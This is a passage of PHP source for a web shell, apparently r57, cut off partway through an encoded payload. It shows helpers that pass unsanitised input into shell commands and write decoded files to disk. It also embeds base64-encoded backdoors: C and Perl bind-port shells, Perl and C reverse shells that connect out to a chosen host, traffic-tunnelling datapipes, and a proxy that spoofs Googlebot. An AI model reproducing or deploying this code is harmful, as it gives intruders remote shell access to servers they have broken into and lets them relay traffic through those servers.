3486 if($checked) $ret .= " checked";
3487
3488 return $ret.">";
3489
3490}
3491
3492function which($pr)
3493
3494{
3495
3496$path = '';
3497
3498$path = ex("which $pr");
3499
3500if(!empty($path)) { return $path; } else { return false; }
3501
3502}
3503
3504function ps($pr)
3505
3506{global $unix;
3507
3508$path = '';
3509
3510if($unix){$path = ex("ps -aux | grep $pr | grep -v 'grep'");}
3511
3512else{$path = ex("tasklist | findstr \"$pr\"");}
3513
3514if(!empty($path)) { return $path; } else { return false; }
3515
3516}
3517
3518function locate($pr)
3519
3520{
3521
3522$path = '';
3523
3524$path = ex("locate $pr");
3525
3526if(!empty($path)) { return $path; } else { return false; }
3527
3528}
3529
3530function cf($fname,$text)
3531
3532{
3533
3534 if(!morewrite($fname,@base64_decode($text))){err(0);};
3535
3536}
3537
3538function sr($l,$t1,$t2)
3539
3540 {
3541
3542 return "<tr class=tr1><td class=td1 width=".$l."% align=right>".$t1."</td><td class=td1 align=left>".$t2."</td></tr>";
3543
3544 }
3545
3546if (!@function_exists("view_size"))
3547
3548{
3549
3550function view_size($size)
3551
3552{
3553
3554 if($size >= 1073741824) {$size = @round($size / 1073741824 * 100) / 100 . " GB";}
3555
3556 elseif($size >= 1048576) {$size = @round($size / 1048576 * 100) / 100 . " MB";}
3557
3558 elseif($size >= 1024) {$size = @round($size / 1024 * 100) / 100 . " KB";}
3559
3560 else {$size = $size . " B";}
3561
3562 return $size;
3563
3564}
3565
3566}
3567
3568 function DirFilesR($dir,$types='')
3569
3570 {
3571
3572 $files = Array();
3573
3574 if(($handle = @opendir($dir)))
3575
3576 {
3577
3578 while (false !== ($file = @readdir($handle)))
3579
3580 {
3581
3582 if ($file != "." && $file != "..")
3583
3584 {
3585
3586 if(@is_dir($dir."/".$file))
3587
3588 $files = @array_merge($files,DirFilesR($dir."/".$file,$types));
3589
3590 else
3591
3592 {
3593
3594 $pos = @strrpos($file,".");
3595
3596 $ext = @substr($file,$pos,@strlen($file)-$pos);
3597
3598 if($types)
3599
3600 {
3601
3602 if(@in_array($ext,explode(';',$types)))
3603
3604 $files[] = $dir."/".$file;
3605
3606 }
3607
3608 else
3609
3610 $files[] = $dir."/".$file;
3611
3612 }
3613
3614 }
3615
3616 }
3617
3618 @closedir($handle);
3619
3620 }
3621
3622 return $files;
3623
3624 }
3625
3626 class SearchResult
3627
3628 {
3629
3630 var $text;
3631
3632 var $FilesToSearch;
3633
3634 var $ResultFiles;
3635
3636 var $FilesTotal;
3637
3638 var $MatchesCount;
3639
3640 var $FileMatschesCount;
3641
3642 var $TimeStart;
3643
3644 var $TimeTotal;
3645
3646 var $titles;
3647
3648 function SearchResult($dir,$text,$filter='')
3649
3650 {
3651
3652 $dirs = @explode(";",$dir);
3653
3654 $this->FilesToSearch = Array();
3655
3656 for($a=0;$a<count($dirs);$a++)
3657
3658 $this->FilesToSearch = @array_merge($this->FilesToSearch,DirFilesR($dirs[$a],$filter));
3659
3660 $this->text = $text;
3661
3662 $this->FilesTotal = @count($this->FilesToSearch);
3663
3664 $this->TimeStart = getmicrotime();
3665
3666 $this->MatchesCount = 0;
3667
3668 $this->ResultFiles = Array();
3669
3670 $this->FileMatchesCount = Array();
3671
3672 $this->titles = Array();
3673
3674 }
3675
3676 function GetFilesTotal() { return $this->FilesTotal; }
3677
3678 function GetTitles() { return $this->titles; }
3679
3680 function GetTimeTotal() { return $this->TimeTotal; }
3681
3682 function GetMatchesCount() { return $this->MatchesCount; }
3683
3684 function GetFileMatchesCount() { return $this->FileMatchesCount; }
3685
3686 function GetResultFiles() { return $this->ResultFiles; }
3687
3688 function SearchText($phrase=0,$case=0) {
3689
3690 $qq = @explode(' ',$this->text);
3691
3692 $delim = '|';
3693
3694 if($phrase)
3695
3696 foreach($qq as $k=>$v)
3697
3698 $qq[$k] = '\b'.$v.'\b';
3699
3700 $words = '('.@implode($delim,$qq).')';
3701
3702 $pattern = "/".$words."/";
3703
3704 if(!$case)
3705
3706 $pattern .= 'i';
3707
3708 foreach($this->FilesToSearch as $k=>$filename)
3709
3710 {
3711
3712 $this->FileMatchesCount[$filename] = 0;
3713
3714 $FileStrings = @file($filename) or @next;
3715
3716 for($a=0;$a<@count($FileStrings);$a++)
3717
3718 {
3719
3720 $count = 0;
3721
3722 $CurString = $FileStrings[$a];
3723
3724 $CurString = @Trim($CurString);
3725
3726 $CurString = @strip_tags($CurString);
3727
3728 $aa = '';
3729
3730 if(($count = @preg_match_all($pattern,$CurString,$aa)))
3731
3732 {
3733
3734 $CurString = @preg_replace($pattern,"<SPAN style='color: #990000;'><b>\\1</b></SPAN>",$CurString);
3735
3736 $this->ResultFiles[$filename][$a+1] = $CurString;
3737
3738 $this->MatchesCount += $count;
3739
3740 $this->FileMatchesCount[$filename] += $count;
3741
3742 }
3743
3744 }
3745
3746 }
3747
3748 $this->TimeTotal = @round(getmicrotime() - $this->TimeStart,4);
3749
3750 }
3751
3752 }
3753
3754 function getmicrotime()
3755
3756 {
3757
3758 list($usec,$sec) = @explode(" ",@microtime());
3759
3760 return ((float)$usec + (float)$sec);
3761
3762 }
3763
3764$port_bind_bd_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3RyaW5nLmg+DQojaW5jbHVkZSA8c3lzL3R5cGVzLmg+DQojaW5jbHVkZS
3765
3766A8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCiNpbmNsdWRlIDxlcnJuby5oPg0KaW50IG1haW4oYXJnYyxhcmd2KQ0KaW50I
3767
3768GFyZ2M7DQpjaGFyICoqYXJndjsNCnsgIA0KIGludCBzb2NrZmQsIG5ld2ZkOw0KIGNoYXIgYnVmWzMwXTsNCiBzdHJ1Y3Qgc29ja2FkZHJfaW4gcmVt
3769
3770b3RlOw0KIGlmKGZvcmsoKSA9PSAwKSB7IA0KIHJlbW90ZS5zaW5fZmFtaWx5ID0gQUZfSU5FVDsNCiByZW1vdGUuc2luX3BvcnQgPSBodG9ucyhhdG9
3771
3772pKGFyZ3ZbMV0pKTsNCiByZW1vdGUuc2luX2FkZHIuc19hZGRyID0gaHRvbmwoSU5BRERSX0FOWSk7IA0KIHNvY2tmZCA9IHNvY2tldChBRl9JTkVULF
3773
3774NPQ0tfU1RSRUFNLDApOw0KIGlmKCFzb2NrZmQpIHBlcnJvcigic29ja2V0IGVycm9yIik7DQogYmluZChzb2NrZmQsIChzdHJ1Y3Qgc29ja2FkZHIgK
3775
3776ikmcmVtb3RlLCAweDEwKTsNCiBsaXN0ZW4oc29ja2ZkLCA1KTsNCiB3aGlsZSgxKQ0KICB7DQogICBuZXdmZD1hY2NlcHQoc29ja2ZkLDAsMCk7DQog
3777
3778ICBkdXAyKG5ld2ZkLDApOw0KICAgZHVwMihuZXdmZCwxKTsNCiAgIGR1cDIobmV3ZmQsMik7DQogICB3cml0ZShuZXdmZCwiUGFzc3dvcmQ6IiwxMCk
3779
37807DQogICByZWFkKG5ld2ZkLGJ1ZixzaXplb2YoYnVmKSk7DQogICBpZiAoIWNocGFzcyhhcmd2WzJdLGJ1ZikpDQogICBzeXN0ZW0oImVjaG8gd2VsY2
3781
37829tZSB0byByNTcgc2hlbGwgJiYgL2Jpbi9iYXNoIC1pIik7DQogICBlbHNlDQogICBmcHJpbnRmKHN0ZGVyciwiU29ycnkiKTsNCiAgIGNsb3NlKG5ld
3783
37842ZkKTsNCiAgfQ0KIH0NCn0NCmludCBjaHBhc3MoY2hhciAqYmFzZSwgY2hhciAqZW50ZXJlZCkgew0KaW50IGk7DQpmb3IoaT0wO2k8c3RybGVuKGVu
3785
3786dGVyZWQpO2krKykgDQp7DQppZihlbnRlcmVkW2ldID09ICdcbicpDQplbnRlcmVkW2ldID0gJ1wwJzsgDQppZihlbnRlcmVkW2ldID09ICdccicpDQp
3787
3788lbnRlcmVkW2ldID0gJ1wwJzsNCn0NCmlmICghc3RyY21wKGJhc2UsZW50ZXJlZCkpDQpyZXR1cm4gMDsNCn0=";
3789
3790$port_bind_bd_pl="IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vYmFzaCAtaSI7DQppZiAoQEFSR1YgPCAxKSB7IGV4aXQoMSk7IH0NCiRMS
3791
3792VNURU5fUE9SVD0kQVJHVlswXTsNCnVzZSBTb2NrZXQ7DQokcHJvdG9jb2w9Z2V0cHJvdG9ieW5hbWUoJ3RjcCcpOw0Kc29ja2V0KFMsJlBGX0lORVQs
3793
3794JlNPQ0tfU1RSRUFNLCRwcm90b2NvbCkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVV
3795
3796TRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJExJU1RFTl9QT1JULElOQUREUl9BTlkpKSB8fCBkaWUgIkNhbnQgb3BlbiBwb3J0XG4iOw0KbG
3797
3798lzdGVuKFMsMykgfHwgZGllICJDYW50IGxpc3RlbiBwb3J0XG4iOw0Kd2hpbGUoMSkNCnsNCmFjY2VwdChDT05OLFMpOw0KaWYoISgkcGlkPWZvcmspK
3799
3800Q0Kew0KZGllICJDYW5ub3QgZm9yayIgaWYgKCFkZWZpbmVkICRwaWQpOw0Kb3BlbiBTVERJTiwiPCZDT05OIjsNCm9wZW4gU1RET1VULCI+JkNPTk4i
3801
3802Ow0Kb3BlbiBTVERFUlIsIj4mQ09OTiI7DQpleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCmNsb3N
3803
3804lIENPTk47DQpleGl0IDA7DQp9DQp9";
3805
3806$back_connect="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj
3807
3808aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR
3809
3810hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT
3811
3812sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI
3813
3814kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi
3815
3816KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl
3817
3818OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw==";
3819
3820$back_connect_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCmludC
3821
3822BtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10pDQp7DQogaW50IGZkOw0KIHN0cnVjdCBzb2NrYWRkcl9pbiBzaW47DQogY2hhciBybXNbMjFdPSJyb
3823
3824SAtZiAiOyANCiBkYWVtb24oMSwwKTsNCiBzaW4uc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogc2luLnNpbl9wb3J0ID0gaHRvbnMoYXRvaShhcmd2WzJd
3825
3826KSk7DQogc2luLnNpbl9hZGRyLnNfYWRkciA9IGluZXRfYWRkcihhcmd2WzFdKTsgDQogYnplcm8oYXJndlsxXSxzdHJsZW4oYXJndlsxXSkrMStzdHJ
3827
3828sZW4oYXJndlsyXSkpOyANCiBmZCA9IHNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSwgSVBQUk9UT19UQ1ApIDsgDQogaWYgKChjb25uZWN0KGZkLC
3829
3830Aoc3RydWN0IHNvY2thZGRyICopICZzaW4sIHNpemVvZihzdHJ1Y3Qgc29ja2FkZHIpKSk8MCkgew0KICAgcGVycm9yKCJbLV0gY29ubmVjdCgpIik7D
3831
3832QogICBleGl0KDApOw0KIH0NCiBzdHJjYXQocm1zLCBhcmd2WzBdKTsNCiBzeXN0ZW0ocm1zKTsgIA0KIGR1cDIoZmQsIDApOw0KIGR1cDIoZmQsIDEp
3833
3834Ow0KIGR1cDIoZmQsIDIpOw0KIGV4ZWNsKCIvYmluL3NoIiwic2ggLWkiLCBOVUxMKTsNCiBjbG9zZShmZCk7IA0KfQ==";
3835
3836$datapipe_c="I2luY2x1ZGUgPHN5cy90eXBlcy5oPg0KI2luY2x1ZGUgPHN5cy9zb2NrZXQuaD4NCiNpbmNsdWRlIDxzeXMvd2FpdC5oPg0KI2luY2
3837
3838x1ZGUgPG5ldGluZXQvaW4uaD4NCiNpbmNsdWRlIDxzdGRpby5oPg0KI2luY2x1ZGUgPHN0ZGxpYi5oPg0KI2luY2x1ZGUgPGVycm5vLmg+DQojaW5jb
3839
3840HVkZSA8dW5pc3RkLmg+DQojaW5jbHVkZSA8bmV0ZGIuaD4NCiNpbmNsdWRlIDxsaW51eC90aW1lLmg+DQojaWZkZWYgU1RSRVJST1INCmV4dGVybiBj
3841
3842aGFyICpzeXNfZXJybGlzdFtdOw0KZXh0ZXJuIGludCBzeXNfbmVycjsNCmNoYXIgKnVuZGVmID0gIlVuZGVmaW5lZCBlcnJvciI7DQpjaGFyICpzdHJ
3843
3844lcnJvcihlcnJvcikgIA0KaW50IGVycm9yOyAgDQp7IA0KaWYgKGVycm9yID4gc3lzX25lcnIpDQpyZXR1cm4gdW5kZWY7DQpyZXR1cm4gc3lzX2Vycm
3845
3846xpc3RbZXJyb3JdOw0KfQ0KI2VuZGlmDQoNCm1haW4oYXJnYywgYXJndikgIA0KICBpbnQgYXJnYzsgIA0KICBjaGFyICoqYXJndjsgIA0KeyANCiAga
3847
3848W50IGxzb2NrLCBjc29jaywgb3NvY2s7DQogIEZJTEUgKmNmaWxlOw0KICBjaGFyIGJ1Zls0MDk2XTsNCiAgc3RydWN0IHNvY2thZGRyX2luIGxhZGRy
3849
3850LCBjYWRkciwgb2FkZHI7DQogIGludCBjYWRkcmxlbiA9IHNpemVvZihjYWRkcik7DQogIGZkX3NldCBmZHNyLCBmZHNlOw0KICBzdHJ1Y3QgaG9zdGV
3851
3852udCAqaDsNCiAgc3RydWN0IHNlcnZlbnQgKnM7DQogIGludCBuYnl0Ow0KICB1bnNpZ25lZCBsb25nIGE7DQogIHVuc2lnbmVkIHNob3J0IG9wb3J0Ow
3853
38540KDQogIGlmIChhcmdjICE9IDQpIHsNCiAgICBmcHJpbnRmKHN0ZGVyciwiVXNhZ2U6ICVzIGxvY2FscG9ydCByZW1vdGVwb3J0IHJlbW90ZWhvc3Rcb
3855
3856iIsYXJndlswXSk7DQogICAgcmV0dXJuIDMwOw0KICB9DQogIGEgPSBpbmV0X2FkZHIoYXJndlszXSk7DQogIGlmICghKGggPSBnZXRob3N0YnluYW1l
3857
3858KGFyZ3ZbM10pKSAmJg0KICAgICAgIShoID0gZ2V0aG9zdGJ5YWRkcigmYSwgNCwgQUZfSU5FVCkpKSB7DQogICAgcGVycm9yKGFyZ3ZbM10pOw0KICA
3859
3860gIHJldHVybiAyNTsNCiAgfQ0KICBvcG9ydCA9IGF0b2woYXJndlsyXSk7DQogIGxhZGRyLnNpbl9wb3J0ID0gaHRvbnMoKHVuc2lnbmVkIHNob3J0KS
3861
3862hhdG9sKGFyZ3ZbMV0pKSk7DQogIGlmICgobHNvY2sgPSBzb2NrZXQoUEZfSU5FVCwgU09DS19TVFJFQU0sIElQUFJPVE9fVENQKSkgPT0gLTEpIHsNC
3863
3864iAgICBwZXJyb3IoInNvY2tldCIpOw0KICAgIHJldHVybiAyMDsNCiAgfQ0KICBsYWRkci5zaW5fZmFtaWx5ID0gaHRvbnMoQUZfSU5FVCk7DQogIGxh
3865
3866ZGRyLnNpbl9hZGRyLnNfYWRkciA9IGh0b25sKDApOw0KICBpZiAoYmluZChsc29jaywgJmxhZGRyLCBzaXplb2YobGFkZHIpKSkgew0KICAgIHBlcnJ
3867
3868vcigiYmluZCIpOw0KICAgIHJldHVybiAyMDsNCiAgfQ0KICBpZiAobGlzdGVuKGxzb2NrLCAxKSkgew0KICAgIHBlcnJvcigibGlzdGVuIik7DQogIC
3869
3870AgcmV0dXJuIDIwOw0KICB9DQogIGlmICgobmJ5dCA9IGZvcmsoKSkgPT0gLTEpIHsNCiAgICBwZXJyb3IoImZvcmsiKTsNCiAgICByZXR1cm4gMjA7D
3871
3872QogIH0NCiAgaWYgKG5ieXQgPiAwKQ0KICAgIHJldHVybiAwOw0KICBzZXRzaWQoKTsNCiAgd2hpbGUgKChjc29jayA9IGFjY2VwdChsc29jaywgJmNh
3873
3874ZGRyLCAmY2FkZHJsZW4pKSAhPSAtMSkgew0KICAgIGNmaWxlID0gZmRvcGVuKGNzb2NrLCJyKyIpOw0KICAgIGlmICgobmJ5dCA9IGZvcmsoKSkgPT0
3875
3876gLTEpIHsNCiAgICAgIGZwcmludGYoY2ZpbGUsICI1MDAgZm9yazogJXNcbiIsIHN0cmVycm9yKGVycm5vKSk7DQogICAgICBzaHV0ZG93bihjc29jay
3877
3878wyKTsNCiAgICAgIGZjbG9zZShjZmlsZSk7DQogICAgICBjb250aW51ZTsNCiAgICB9DQogICAgaWYgKG5ieXQgPT0gMCkNCiAgICAgIGdvdG8gZ290c
3879
388029jazsNCiAgICBmY2xvc2UoY2ZpbGUpOw0KICAgIHdoaWxlICh3YWl0cGlkKC0xLCBOVUxMLCBXTk9IQU5HKSA+IDApOw0KICB9DQogIHJldHVybiAy
3881
3882MDsNCg0KIGdvdHNvY2s6DQogIGlmICgob3NvY2sgPSBzb2NrZXQoUEZfSU5FVCwgU09DS19TVFJFQU0sIElQUFJPVE9fVENQKSkgPT0gLTEpIHsNCiA
3883
3884gICBmcHJpbnRmKGNmaWxlLCAiNTAwIHNvY2tldDogJXNcbiIsIHN0cmVycm9yKGVycm5vKSk7DQogICAgZ290byBxdWl0MTsNCiAgfQ0KICBvYWRkci
3885
38865zaW5fZmFtaWx5ID0gaC0+aF9hZGRydHlwZTsNCiAgb2FkZHIuc2luX3BvcnQgPSBodG9ucyhvcG9ydCk7DQogIG1lbWNweSgmb2FkZHIuc2luX2FkZ
3887
3888HIsIGgtPmhfYWRkciwgaC0+aF9sZW5ndGgpOw0KICBpZiAoY29ubmVjdChvc29jaywgJm9hZGRyLCBzaXplb2Yob2FkZHIpKSkgew0KICAgIGZwcmlu
3889
3890dGYoY2ZpbGUsICI1MDAgY29ubmVjdDogJXNcbiIsIHN0cmVycm9yKGVycm5vKSk7DQogICAgZ290byBxdWl0MTsNCiAgfQ0KICB3aGlsZSAoMSkgew0
3891
3892KICAgIEZEX1pFUk8oJmZkc3IpOw0KICAgIEZEX1pFUk8oJmZkc2UpOw0KICAgIEZEX1NFVChjc29jaywmZmRzcik7DQogICAgRkRfU0VUKGNzb2NrLC
3893
3894ZmZHNlKTsNCiAgICBGRF9TRVQob3NvY2ssJmZkc3IpOw0KICAgIEZEX1NFVChvc29jaywmZmRzZSk7DQogICAgaWYgKHNlbGVjdCgyMCwgJmZkc3IsI
3895
3896E5VTEwsICZmZHNlLCBOVUxMKSA9PSAtMSkgew0KICAgICAgZnByaW50ZihjZmlsZSwgIjUwMCBzZWxlY3Q6ICVzXG4iLCBzdHJlcnJvcihlcnJubykp
3897
3898Ow0KICAgICAgZ290byBxdWl0MjsNCiAgICB9DQogICAgaWYgKEZEX0lTU0VUKGNzb2NrLCZmZHNyKSB8fCBGRF9JU1NFVChjc29jaywmZmRzZSkpIHs
3899
3900NCiAgICAgIGlmICgobmJ5dCA9IHJlYWQoY3NvY2ssYnVmLDQwOTYpKSA8PSAwKQ0KCWdvdG8gcXVpdDI7DQogICAgICBpZiAoKHdyaXRlKG9zb2NrLG
3901
3902J1ZixuYnl0KSkgPD0gMCkNCglnb3RvIHF1aXQyOw0KICAgIH0gZWxzZSBpZiAoRkRfSVNTRVQob3NvY2ssJmZkc3IpIHx8IEZEX0lTU0VUKG9zb2NrL
3903
3904CZmZHNlKSkgew0KICAgICAgaWYgKChuYnl0ID0gcmVhZChvc29jayxidWYsNDA5NikpIDw9IDApDQoJZ290byBxdWl0MjsNCiAgICAgIGlmICgod3Jp
3905
3906dGUoY3NvY2ssYnVmLG5ieXQpKSA8PSAwKQ0KCWdvdG8gcXVpdDI7DQogICAgfQ0KICB9DQoNCiBxdWl0MjoNCiAgc2h1dGRvd24ob3NvY2ssMik7DQo
3907
3908gIGNsb3NlKG9zb2NrKTsNCiBxdWl0MToNCiAgZmZsdXNoKGNmaWxlKTsNCiAgc2h1dGRvd24oY3NvY2ssMik7DQogcXVpdDA6DQogIGZjbG9zZShjZm
3909
3910lsZSk7DQogIHJldHVybiAwOw0KfQ==";
3911
3912$datapipe_pl="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgSU86OlNvY2tldDsNCnVzZSBQT1NJWDsNCiRsb2NhbHBvcnQgPSAkQVJHVlswXTsNCiRob3N0I
3913
3914CAgICAgPSAkQVJHVlsxXTsNCiRwb3J0ICAgICAgPSAkQVJHVlsyXTsNCiRkYWVtb249MTsNCiRESVIgPSB1bmRlZjsNCiR8ID0gMTsNCmlmICgkZGFl
3915
3916bW9uKXsgJHBpZCA9IGZvcms7IGV4aXQgaWYgJHBpZDsgZGllICIkISIgdW5sZXNzIGRlZmluZWQoJHBpZCk7IFBPU0lYOjpzZXRzaWQoKSBvciBkaWU
3917
3918gIiQhIjsgfQ0KJW8gPSAoJ3BvcnQnID0+ICRsb2NhbHBvcnQsJ3RvcG9ydCcgPT4gJHBvcnQsJ3RvaG9zdCcgPT4gJGhvc3QpOw0KJGFoID0gSU86Ol
3919
3920NvY2tldDo6SU5FVC0+bmV3KCdMb2NhbFBvcnQnID0+ICRsb2NhbHBvcnQsJ1JldXNlJyA9PiAxLCdMaXN0ZW4nID0+IDEwKSB8fCBkaWUgIiQhIjsNC
3921
3922iRTSUd7J0NITEQnfSA9ICdJR05PUkUnOw0KJG51bSA9IDA7DQp3aGlsZSAoMSkgeyANCiRjaCA9ICRhaC0+YWNjZXB0KCk7IGlmICghJGNoKSB7IHBy
3923
3924aW50IFNUREVSUiAiJCFcbiI7IG5leHQ7IH0NCisrJG51bTsNCiRwaWQgPSBmb3JrKCk7DQppZiAoIWRlZmluZWQoJHBpZCkpIHsgcHJpbnQgU1RERVJ
3925
3926SICIkIVxuIjsgfSANCmVsc2lmICgkcGlkID09IDApIHsgJGFoLT5jbG9zZSgpOyBSdW4oXCVvLCAkY2gsICRudW0pOyB9IA0KZWxzZSB7ICRjaC0+Y2
3927
3928xvc2UoKTsgfQ0KfQ0Kc3ViIFJ1biB7DQpteSgkbywgJGNoLCAkbnVtKSA9IEBfOw0KbXkgJHRoID0gSU86OlNvY2tldDo6SU5FVC0+bmV3KCdQZWVyQ
3929
3930WRkcicgPT4gJG8tPnsndG9ob3N0J30sJ1BlZXJQb3J0JyA9PiAkby0+eyd0b3BvcnQnfSk7DQppZiAoISR0aCkgeyBleGl0IDA7IH0NCm15ICRmaDsN
3931
3932CmlmICgkby0+eydkaXInfSkgeyAkZmggPSBTeW1ib2w6OmdlbnN5bSgpOyBvcGVuKCRmaCwgIj4kby0+eydkaXInfS90dW5uZWwkbnVtLmxvZyIpIG9
3933
3934yIGRpZSAiJCEiOyB9DQokY2gtPmF1dG9mbHVzaCgpOw0KJHRoLT5hdXRvZmx1c2goKTsNCndoaWxlICgkY2ggfHwgJHRoKSB7DQpteSAkcmluID0gIi
3935
3936I7DQp2ZWMoJHJpbiwgZmlsZW5vKCRjaCksIDEpID0gMSBpZiAkY2g7DQp2ZWMoJHJpbiwgZmlsZW5vKCR0aCksIDEpID0gMSBpZiAkdGg7DQpteSgkc
3937
3938m91dCwgJGVvdXQpOw0Kc2VsZWN0KCRyb3V0ID0gJHJpbiwgdW5kZWYsICRlb3V0ID0gJHJpbiwgMTIwKTsNCmlmICghJHJvdXQgICYmICAhJGVvdXQp
3939
3940IHt9DQpteSAkY2J1ZmZlciA9ICIiOw0KbXkgJHRidWZmZXIgPSAiIjsNCmlmICgkY2ggJiYgKHZlYygkZW91dCwgZmlsZW5vKCRjaCksIDEpIHx8IHZ
3941
3942lYygkcm91dCwgZmlsZW5vKCRjaCksIDEpKSkgew0KbXkgJHJlc3VsdCA9IHN5c3JlYWQoJGNoLCAkdGJ1ZmZlciwgMTAyNCk7DQppZiAoIWRlZmluZW
3943
3944QoJHJlc3VsdCkpIHsNCnByaW50IFNUREVSUiAiJCFcbiI7DQpleGl0IDA7DQp9DQppZiAoJHJlc3VsdCA9PSAwKSB7IGV4aXQgMDsgfQ0KfQ0KaWYgK
3945
3946CR0aCAgJiYgICh2ZWMoJGVvdXQsIGZpbGVubygkdGgpLCAxKSAgfHwgdmVjKCRyb3V0LCBmaWxlbm8oJHRoKSwgMSkpKSB7DQpteSAkcmVzdWx0ID0g
3947
3948c3lzcmVhZCgkdGgsICRjYnVmZmVyLCAxMDI0KTsNCmlmICghZGVmaW5lZCgkcmVzdWx0KSkgeyBwcmludCBTVERFUlIgIiQhXG4iOyBleGl0IDA7IH0
3949
3950NCmlmICgkcmVzdWx0ID09IDApIHtleGl0IDA7fQ0KfQ0KaWYgKCRmaCAgJiYgICR0YnVmZmVyKSB7KHByaW50ICRmaCAkdGJ1ZmZlcik7fQ0Kd2hpbG
3951
3952UgKG15ICRsZW4gPSBsZW5ndGgoJHRidWZmZXIpKSB7DQpteSAkcmVzID0gc3lzd3JpdGUoJHRoLCAkdGJ1ZmZlciwgJGxlbik7DQppZiAoJHJlcyA+I
3953
3954DApIHskdGJ1ZmZlciA9IHN1YnN0cigkdGJ1ZmZlciwgJHJlcyk7fSANCmVsc2Uge3ByaW50IFNUREVSUiAiJCFcbiI7fQ0KfQ0Kd2hpbGUgKG15ICRs
3955
3956ZW4gPSBsZW5ndGgoJGNidWZmZXIpKSB7DQpteSAkcmVzID0gc3lzd3JpdGUoJGNoLCAkY2J1ZmZlciwgJGxlbik7DQppZiAoJHJlcyA+IDApIHskY2J
3957
39581ZmZlciA9IHN1YnN0cigkY2J1ZmZlciwgJHJlcyk7fSANCmVsc2Uge3ByaW50IFNUREVSUiAiJCFcbiI7fQ0KfX19DQo=";
3959
3960$prx_pl="IyF1c3IvYmluL3BlcmwKdXNlIFNvY2tldDsKbXkgJHBvcnQgPSAkQVJHVlswXXx8MzEzMzc7Cm15ICRwcm90b2NvbCA9IGdldHByb3RvYn
3961
3962luYW1lKCd0Y3AnKTsKbXkgJG15X2FkZHIgID0gc29ja2FkZHJfaW4gKCRwb3J0LCBJTkFERFJfQU5ZKTsKc29ja2V0IChTT0NLLCBBRl9JTkVULCBTT
3963
39640NLX1NUUkVBTSwgJHByb3RvY29sKSBvciBkaWUgInNvY2tldCgpOiAkISI7CnNldHNvY2tvcHQgKFNPQ0ssIFNPTF9TT0NLRVQsIFNPX1JFVVNFQURE
3965
3966UiwxICkgb3IgZGllICJzZXRzb2Nrb3B0KCk6ICQhIjsKYmluZCAoU09DSywgJG15X2FkZHIpIG9yIGRpZSAiYmluZCgpOiAkISI7Cmxpc3RlbiAoU09
3967
3968DSywgU09NQVhDT05OKSBvciBkaWUgImxpc3RlbigpOiAkISI7CiRTSUd7J0lOVCd9ID0gc3ViIHsKY2xvc2UgKFNPQ0spOwpleGl0Owp9Owp3aGlsZS
3969
3970AoMSkgewpuZXh0IHVubGVzcyBteSAkcmVtb3RlX2FkZHIgPSBhY2NlcHQgKFNFU1NJT04sIFNPQ0spOwpteSAoJGZpc3QsICRtZXRob2QsICRyZW1vd
3971
3972GVfaG9zdCwgJHJlbW90ZV9wb3J0KSA9IGFuYWx5emVfcmVxdWVzdCgpOwppZihvcGVuX2Nvbm5lY3Rpb24gKFJFTU9URSwgJHJlbW90ZV9ob3N0LCAk
3973
3974cmVtb3RlX3BvcnQpID09IDApIHsKY2xvc2UgKFNFU1NJT04pOwpuZXh0Owp9CnByaW50IFJFTU9URSAkZmlyc3Q7CnByaW50IFJFTU9URSAiVXNlci1
3975
3976BZ2VudDogR29vZ2xlYm90LzIuMSAoK2h0dHA6Ly93d3cuZ29vZ2xlLmNvbS9ib3QuaHRtbClcbiI7CndoaWxlICg8U0VTU0lPTj4pIHsKbmV4dCBpZi
3977
3978AoL1Byb3h5LUNvbm5lY3Rpb246LyB8fCAvVXNlci1BZ2VudDovKTsKcHJpbnQgUkVNT1RFICRfOwpsYXN0IGlmICgkXyA9fiAvXltcc1x4MDBdKiQvK
3979
3980TsKfQpwcmludCBSRU1PVEUgIlxuIjsKJGhlYWRlciA9IDE7CndoaWxlICg8UkVNT1RFPikgewpwcmludCBTRVNTSU9OICRfOwppZiAoJGhlYWRlcikg
3981
3982eyAgICAgCmlmICgkaGVhZGVyICYmICRfID1+IC9eW1xzXHgwMF0qJC8pIHsKJGhlYWRlciA9IDA7Cn0KfQp9CmNsb3NlIChSRU1PVEUpOwpjbG9zZSA
3983
3984oU0VTU0lPTik7Cn0KY2xvc2UgKFNPQ0spOwpzdWIgYW5hbHl6ZV9yZXF1ZXN0IHsKbXkgKCRmaXN0LCAkdXJsLCAkcmVtb3RlX2hvc3QsICRyZW1vdG
